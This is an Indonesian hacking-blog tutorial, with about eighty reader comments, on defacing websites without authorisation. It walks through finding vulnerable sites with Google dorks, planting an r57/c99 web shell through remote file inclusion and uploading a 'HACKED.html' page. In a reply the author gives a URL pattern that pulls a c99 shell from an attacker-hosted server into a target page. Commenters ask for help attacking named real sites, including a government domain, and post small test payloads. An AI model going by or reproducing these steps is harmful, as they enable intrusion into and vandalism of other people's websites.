Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

Deface Website

17 March 2011
Penulis:   · Kategori Artikel: Hacking

BINUS HACKER Binus Hacker Is Not Criminal Banner





Hi semuanya, kembali lagi dengan saya. Kali ini mau berbagi bagaimana cara Deface Website, karena yang request Cara Deface Website ini banyak sekali, bejibun masuk ke email saya. Akhirnya saya membuat artikel ini untuk memenuhi peremintaan kalian semua, let’s DEFACE WEBSITE – DEFACING WEBSITE..

Okelah kalau begitu semuanya, langsung lanjut ajah, skenarionya sebagai berikut:

  1. Anda sudah memiliki target website, kalau masih belum silakan cari di google melalui google dork yang anda punya atau bisa melihat Google Dork Remote File Inclusion – Webapps di www.exploit-db.com sampai Anda berhasil mendapatkan Target Website.
  2. Setelah mendapatkan target website, silakan upload SHELL INJECT anda, kebetulan saya menggunakan tools sendiri “File Manager Binus Hacker” :) (Maaf: tidak untuk dipublikasikan) Anda bisa menggunakan r57shell / c99 shell / lainnya. Toolsnya bisa di download disini untuk rshell / c99: Download Shell Injection
  3. Setelah anda mengupload Shell Injection, siapkan halaman “DEFACEMENT PAGE“, kebetulan saya menamainya dengan”HACKED.html
  4. Setelah itu silakan kunjungi website target anda yang sudah di Deface.

Penjelasannya detail & langkah-langkahnya:
1. Silakan cari target di google, misalnya: “inurl:page.php?xxx=” atau “intitle: Google Dork” (Kumpulan google dork banyak tersedia di google, silakan di search aja) atau anda bisa melihat list Google Dork Di www.exploit-db.com , kemudian inject target website tersebut. Nah, kebetulan saya mendapatkan target dibawah & kemudian melakukan aktifitas shell injection, berikut gambarnya:

Deface Website - Website Target

 

2. Langkah selanjutnya, saya melakukan upload fmbh.php (File Manager Binus Hacker), Anda bisa menggunakan Rshell / C99 untuk di upload ke website target tersebut. Directory yang saya pakai di webtarget adalah /vservers/silentcat/htdocs/includes/. Jadi ketika saya membuka shell di target menjadi: http://www.target.com/includes/fmbh.php

Deface Website - Update Shell

 

3. Setelah itu kita siapkan file halaman defacement: “HACKED.html

Defacing Website - Membuat Halaman Defacement

Kemudian kita save menjadi: “HACKED.html
Defacing Website - Halaman Deface Page

 

4. Upload “HACKED.html” ke website target tadi, saya melakukan upload di /vservers/silentcat/htdocs/ artinya saya berada di lingkungan home directory.

Deface Website - Lokasi Home Directory Website

Upload file HACKED.html, dari local computer yang anda simpan tadi.

Deface Website - Cara Upload Page Defacement

Sehingga akan tampak hasil upload file “HACKED.html” sebagai berikut:
Deface Website - Hasil Upload File Hacked Html

Dikarenakan permissionnya “600” (rw——-), artinya hanya Owner saja yang bisa melakukan “read & write” di file tersebut, kita harus merubah permissionnya menjadi “777” / “755”, kalau 777 artinya semuanya memiliki akses “read, write & execute”, sedangkan saya hanya memakai “755” biar bisa di baca & eksekusi saja:

Defacing Website - CHMOD file

 

5. Jika sudah selesai, maka lihat hasil DEFACE di: “http://www.target.com/hacked.html” , berikut hasil tampilannya:

Defacement Website - Result

Nah, sudah selesai.. Cukup mudah melakukan deface website, silakan lakukan eksperimen yang lebih banyak lagi.

Enjoy & Eat It!

Salam Hangat Buat BinusHacker Family (Lama Kita Tak Bersua, Ayo Ngumpul Lagi!) :) :) :)

Silakan jalan-jalan ke website saya: www.utuhwibowo.com

Silakan Follow Twitter Saya:

Follow Utuh Wibowo Twiiter

BINUS HACKER Binus Hacker Chat and Forum

Komentar

80 Komentar Untuk “Deface Website
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. Agung Wibowo pada 17 March 2011 7:53 pm

    Salam Kenal, saya baru-baru ini tertipu melalui situs toko online. saya takutnya ada korban selanjutnya. mohon untuk di hack atau di bumi hanguskan web tersebut. untuk situs yang bersangkutan kita bisa komunikasi via e-mail gan.

  2. Hilman Fahrudin pada 17 March 2011 11:19 pm

    bang, ana lagi perlu untuk software mengembalikan file & folder khususnya di CD atau CD RW.

    saya tunggu balasannya…

    thank’s ya

  3. joni pada 18 March 2011 7:34 pm

    gan gimna cara ngbil fb ya fb saya kemarn di heck org gan dimna cara ngbalikin ya tolong gan,,,

  4. joni pada 18 March 2011 7:35 pm

    kasitau gan gimna cara ya…?????

  5. Bastian pada 20 March 2011 2:26 am

    Emang gak ada matinya nih SUHU Utuh.
    Gon si.. Gon si.. Suhu

  6. dewo pada 20 March 2011 5:01 am

    wah,ga di jelasin nih mas cara ngupload shellnya ke web?
    klo pake cara di atas “exploreid=alamat shell kita” kayaknya ga bisa deh mas

  7. UtuH pada 20 March 2011 5:33 am

    Untuk upload shell sangat mudah, kebanykan sudah di sediakan dari tools injection kita sendiri,
    Nah untuk yang private shell ini jarang ada.

    Silakan dari shell inject, Cari pilihan: BROWSE -> UPLOAD

  8. dewa jenggot pada 20 March 2011 6:00 am

    hlow,.slm knal mas utuh.,
    sy mo numpang tny,,ni website dah sy cba pke cra2 dlm sql inject buat cari nama tabel/nmor “ajaib”ny tp koq ttap blm bsa y.,,
    bs tlg bantu gs mas??
    sy bru mocoba aj ni,,skedar blajar2 mas..hehe.,.,
    ni alamat webnya : http://www.sikkakab.go.id/index.php?hal=tampilbktm&offset=300
    mhon pncerahan n penerangannya y mas.,
    trmksih byk,.,

  9. amatir pada 22 March 2011 7:44 am

    gan,penjelasan 1 dan 2 itu gimana,kurang paham saya,cara ngupload ke shell inject nya juga gimana tuh,trus donlot an rshell / c99 nya emang berbentuk text ya,tolong lebih rinci dong gan,kirim ke email ya..please,saya lagi belajar deface pusing,smw infonya ga ada yang jelas,dah saya otak atik malah pusing sendiri,nah di forum ini udah lumayan ngejelasin tapi juga masi rada bingung gan,trims gan…
    Salam,

  10. coziro pada 22 March 2011 3:54 pm

    google dork itu apa ya ga dah nyari artinya di google ga ketemu maklum masih nubi
    ajarin cara deface yg manual tapi yg sederhana donk ga thanks

  11. egi pada 23 March 2011 12:19 pm

    shell kaya c99 itu ngejalaninnya harus di upload dulu ya ?
    jadi kita ngejalaninnya lewat internet?
    kalo iya share tempat hostingnya donk,soalnya saya upload di ripway akunnya di suspend mulu setiap saya mau ngejalanin shell nya,,,
    terimakasih sebelumnya,,

  12. steve pada 23 March 2011 12:29 pm

    mas ini tools wat upload shell nya mana ya??koq yg ada cma file php nya aja tapi tools wat uploadnya ga ada…thx be4

  13. UtuH pada 24 March 2011 6:51 pm

    steve: silakan shellnya dicari bisa menggunakan C99 / RShell.

  14. iwan pada 25 March 2011 9:29 am

    itu file phpnya di upload kan kk?
    tapi di upload dmn ya?
    soalnya saya udah cobla upload di beberapa free hosting gk mau kebuka malah ngedownload lagi,,,,

  15. acizninja pada 25 March 2011 10:17 am

    @ Steve : klo mau upload shell musti nyari web victim dulu, trus di inject, upload dah shell/backdoornya…

  16. UtuH pada 25 March 2011 12:48 pm

    @Iwan: Untuk php injector backdoor di upload di website target, untuk pencarinya bisa dari website lain.

    Jadi bisa seperti ini URL nya dari web target:

    http://www.web-taarget-anda.com/page.php?exploreid=http://www.web-tempat-menyimpan-shell-inject.com/nama-folder-injector/c99.txt?

  17. Enrik_kazh0 pada 26 March 2011 3:31 am

    He He He, Maksud Mas itu “inurl:modules.php?name=forums” Yaaa… ???????

  18. zhie pada 26 March 2011 9:52 am

    nah ini gan yang selalu bikin ane bingung.saat shel injection…
    cara buat inject script ke web target itu dari mana???
    ane bener-bener g ngerti.
    dah cari tutor, bukannya ngerti tapi malah tambah ruwet.

    Mohon pencerahannya…

  19. hakz pada 26 March 2011 9:39 pm

    harusnya di jelasin bang klo bug nya RFI,
    sebab dari bug itu apa dan bagaimana cara patchnya… setidaknya biar pembaca yang lain tidak bingung.. masak langsung pakai google dork dan paste exploit.. ^.^
    maaf saya hanya kasih saran buat menambahkan aja…

  20. UtuH pada 26 March 2011 9:44 pm

    @hakz: Thanks atas masukannya bro, i miss it! < - Saya suka dengan orang yang selalu memberikan masukan untuk menyempurnakan artikel.

    Saya tambahin dulu penjelasannya..

    Jempol buat anda.. :)

  21. Rendi pada 26 March 2011 9:58 pm

    Terima kasih Suhu Utuh.
    Saya sangat suka membaca artikel dari Anda.
    Selalu sangat bermanfaat bagi pengetahuan saya.

    Terus bikin artikel ya mas, saya tunggu :)

  22. Deni pada 26 March 2011 10:01 pm

    cocok, ini artikel yang gwe cari.
    ketemu juga di binushacker.
    hehehe

  23. Taufan pada 26 March 2011 10:11 pm

    Yang di exploit DB itu Google Hacking DataBase bukan?
    Jadi yang kita cari yang Remote File ya di exploit-db ya.
    Terima kasih pencerahannya master, saya coba dulu ke TKP.

  24. Nama aja pada 27 March 2011 9:49 am

    window.alert(“hehehehehehehe”);

  25. Sal3h HAckar pada 27 March 2011 10:11 pm

    zzzzzzzzzzzzzz
    i want to be hacker.,., but i dont have tool for hacker.,.
    aunt binus pliss give me some tool for hack you

  26. Sal3h HAckar pada 27 March 2011 10:13 pm

    hahahahaha

  27. hakz pada 28 March 2011 8:10 pm

    sama2 bang utuh… :D

  28. fauzi pada 29 March 2011 3:13 am

    buka web saya

  29. iwan pada 29 March 2011 9:14 am

    kk itu injector.txt yag kk pake isinya apa soalnya saya pake c99.txt di situ keluar tulisan you has entered invalid character,,,,
    mohon pencerahannya,,,

  30. iwan pada 29 March 2011 12:13 pm

    oia satu lagi kk,itu tempat nyimpannya harus online atau di database buatan sendiri seperti phptriad juga bisa,,,,?
    maaaaf ya kk saya banyak nanya,bis newbie bgt nih kk,,,,hehehe:D

  31. vjpith pada 30 March 2011 2:21 pm

    (numpang promo blog saya…) penjelasan tentang hacking, cracking, tips and trik..bisa kalian liat juga disini http://vjpith.blogspot.com

  32. Fadlie pada 1 April 2011 8:54 pm

    Waw… gara2 lupa update ternyata Websiteku di hacking juga hahaha makasih buat teman2 dari Malang Hacker :) viva Hacker Indonesia :)

    NB: utuh apa kabar loe?

  33. UtuH pada 2 April 2011 7:02 am

    @Fadlie: Wah, kabar baik fren. Lama gak bersua :)

  34. bahly pada 9 April 2011 1:57 am

    Salam Kenal, Trima ksh atas Info Dan Tutorialnya , Mudah2an ini bisa menjadi antisipasi buat kami sehingga bisa terhindar dari hacker2 lainnya

  35. L pada 9 April 2011 12:34 pm

    kak, kalo mau hack website itu harus download Shell Injection dulu ya?
    mohon bantuannya ya

  36. Rizkyxp pada 11 April 2011 3:14 am

    mass bantuin donk aqu di deface nih http://teknologi.orgfree.com/ and http://kumpul-forum.ueuo.com/ bisa gak mas tolong donk

  37. Falcon pada 15 April 2011 1:15 am

    gw udah download shell injection ternyata itu file php nah sekarang cara upload file php itu ke web server target gimana ya?

  38. ItsMeChristo pada 18 April 2011 6:11 am

    Hmm.. bsk nyoba praktekin ah hehehehe

  39. afian pada 18 April 2011 11:12 am

    gan ini gimana sih cara upload shell nya ? yang di dwnload itu .php doang gk ada uploader nya

  40. UtuH pada 18 April 2011 4:25 pm

    @Afian: Pada r57 / c99 semua ada fasilitas upload localfile, silakan ditelusuri lebih dalam lagi.
    @Falcon: Silakan cari vulnerability di google, kemudian cari yang Remote File Inclusion.
    @L: Tidak harus download shell injection untuk deface, tergantung dari metode yang digunakan.

  41. Phenom6492 pada 19 April 2011 12:33 am

    gan sorry mau nanya..deface itu kan buat ngerubah website orang ya?tapi kalo [http://www.target.com/hacked.html] berarti kita bikin sub website dari http://www.target.com donk?

    satu lagi gimana caranya agar kalo orang lain ketik http://www.target.com langsung halaman yyg kita deface tadi?

  42. Yulfan pada 19 April 2011 12:41 am

    bang..
    tau cara memperbesar size usb…??

  43. AMi pada 19 April 2011 9:50 am

    Bang, saya kan uda dapat C99.php nya. Trus gimana buat Upload ke Servernya, kita kan ga bisa sembarangan langsung upload tuh file ke direktori target. Mohon pencerahannya.. makasih ;)

  44. bang ray pada 19 April 2011 6:10 pm

    kk tolong beri langkah-langkah yang lebih rinci lagi dong ke email saya,,maklum lagi mau belajar soal yang beginian nh…
    makasih sebelumnya…

  45. excell aevolutione pada 20 April 2011 11:28 pm

    GAn mohon maaf ni sebelumnya, ane masih kurang paham ni ma tutorial di atas, bisa kasih tw lebih detailnya gak di email saya…..

  46. algam pada 25 April 2011 7:30 am

    cara uploadnya gimana gan??????

  47. Rahmat pada 1 May 2011 4:36 pm

    kok gak bisa d download shell nya?

  48. Reynaldo pada 2 May 2011 6:29 pm

    coba dulu gan… :D

    thx for info n tutorial’ny… :)

  49. Stampede pada 6 May 2011 8:14 am

    Masih bingung nih pak untuk newbie hehehe

  50. test pada 22 May 2011 7:55 pm

    unlink(“index.php”)

  51. sunburn pada 23 May 2011 9:00 am

    salam, bro klo ingin punya notepad hacked.HTML toolx paan ya?apa jadi satu bunndle pack? matur tengkyu sory..baru belajar,hehe..

  52. c0d3HitLER pada 23 May 2011 11:05 pm

    @Phenom6492 : sudah dijawab di forum Binus Hacker :D
    untuk upload shell kita bisa mencari fungsi uploader, nah untuk ini kita musti jeli mencari dimana uploader berada dan tidak semua uplader dalam situs bisa untuk mengupload shell

  53. floxster pada 30 May 2011 3:08 am

    kk kalo bisa buat VIDEOnya juga donk

  54. dafreak pada 5 June 2011 12:20 pm

    mas,, jujur bgt nii saya udah coba 4 jam dan ga ngerti + failed step 1 dan ke 2 ,(msh awam)hehe
    ni link yang saya dapt dari http://www.exploit-db.com ….. http://www.exploit-db.com/exploits/17358/
    saya udh download c99 n r57
    dan saya udah bikin halaman defacement nya (niat bgt blajar ini)
    tp walhasil,, saya gatau harus diapain, krn stuck di step 1 n ke 2.
    udh googling cara deface di web ato blog lain (x aja ada yg lebih bs dimengerti kaum awam) tp kebanyakan fake dan pake app ga jelas.(tkt virus)
    masukan mas, tlng disederhanakan lagi dn lebih detail,,(bukan males usaha tp beneran ga ngerti) :(
    karna mungkin kalo deface udah ngerti kita para nubie bs explore sendiri.
    maaf ngerepotin,, tp saya tertarik bgt dengn ini..thx b4 n after,, :)

  55. MOHAMMAD pada 7 June 2011 12:36 am

    Bang gue ngin sekali bergabung dengan HACKING, mungkin bisa memberi solusi bang ma gue? Karena gue ngin jadi orang yang mampu dalam bidang tekhnoligi karena cita-cita gue ngin jadi HACKING semenjak kecil. Sebelumnya Makasih Bang!!

  56. z-d pada 7 June 2011 4:50 am

    kerenzzzz

  57. michael_wafiq pada 7 June 2011 9:30 am

    gmn gan kalo yang type asp…
    kok susah banget ya???

  58. KhoZoA pada 10 June 2011 12:16 am

    Mas, kasih dong yg lebih jelas lagi caranya. Masa gak dikasih tau cara menginjeksi ke webnya !!!!!!!

  59. andrio pada 1 July 2011 11:52 pm

    gak iya nee SHELL INJECTION nya , gak aada

  60. c0d3HitLER pada 3 July 2011 3:45 am

    silakan yang matu tau cara uplad shell untuk merujuk kemari
    http://www.youtube.com/results?search_query=shell+upload&aq=f

  61. wong pada 7 July 2011 7:02 pm

    Sama seperti komen pertama (sdr Agung). Saya juga pernah tertipu oleh salah satu situs money game.

    Ingin sekali rasanya meng-crack situs tersebut. Selain karena kesal, juga supaya orang lain tidak kena tipu lagi.

    Kalo bisa dibantu, atau diberi tahu tutorialnya. Sekedar info, saya pernah belajar sedikit dan nemu kalo situsnya basis linux dan server apache. Katanya sih sulit ditembus, tapi bisa gak ya?

    Mungkin nanti kita bisa lanjutkan via email. thanks :)

  62. c0d3HitLER pada 16 July 2011 11:08 pm

    @wong : yang dimaksud sulit ditembus adalah ketika shell exec disabled
    kalo enambed gag masalah ;-)

  63. smoker pada 30 July 2011 1:07 pm

    kk bagi toolsnya dong yang untuk deface, , ,
    ak sneng dengan forum nie klo ada team hackernya ak mau ikut, , ,
    butuh banyak tuntunan dari master2, ,
    hidup hacker Indonesia, , ,

  64. Dini pada 3 August 2011 6:58 am

    Shell-nya di localroot.net gk bsa di download gan.. Account Suspended

  65. pein pada 21 August 2011 12:44 am

    gan kenpa link di atas g mau di download y? Download Shell Injection

  66. hilman pada 9 September 2011 4:52 am

    bgus gan artikelnya

  67. ferry pada 22 October 2011 9:01 am

    mantap gan..cuma belum berani nyoba..mau lebih dalam dulu belajarnya….

  68. HL pada 6 November 2011 10:17 pm

    gan tolong diperbaiki link downloadnya ??

  69. ichwan pada 21 November 2011 2:53 pm

    kk cara ulpload shellnya gmn ?? ( maklum newbie)

  70. farid pada 20 December 2011 9:43 am

    @UtuH pada penjelasan no1 saya kurang jelas klw boleh tau boleh di perjelasin gk dari masing2 penjelasan yang udah ada
    tolong dipots penjelasan nya mas
    mungkin itu saja yang bisa saya sampaikan terima kasih

  71. Shadow pada 6 January 2012 12:06 am

    @UtuH

    Apa bisa d perjelas untuk langkah-langkah no 1 & 2

    Terimakasih…

  72. melas pada 10 March 2012 8:19 am

    tolong kirim tutor step by steb ke email saya ?

  73. melas pada 12 March 2012 10:18 pm

    @utuh
    minta dork yang dipakek itu dong please

  74. win pada 13 March 2012 5:18 am

    mantap…..

  75. papa pada 22 April 2012 10:51 pm

    gan, gimana kalo webnya gak nginjinin format *.php, gimana mau di upload ?

  76. ayah pada 16 July 2012 10:39 am

    gan cara ngupload shellnya ke web tersebut gimana…???(q masih belajar)

  77. Mmc Agus pada 28 July 2012 5:14 am

    Misi gan….
    gimana cara menaruh halaman deface kita d halaman utama suatu web…
    Misal.x sya mau deface http://www.blablabla.com
    Dan pada saat ngebuka http://www.blablabla.com halaman deface sya langsung muncul,,,,
    Thanks :)

  78. Faris pada 24 November 2012 11:43 pm

    PERMISI GAN
    TOLONG SHARE HACK EMAIL YAHOO DONK :D

  79. Macam – macam penjelasan penting | Blog's Alfian pada 4 March 2013 8:00 pm

    [...] Sumber [...]

  80. CyBerD0RK pada 3 April 2014 5:08 am

Silahkan Berikan Tanggapan Anda...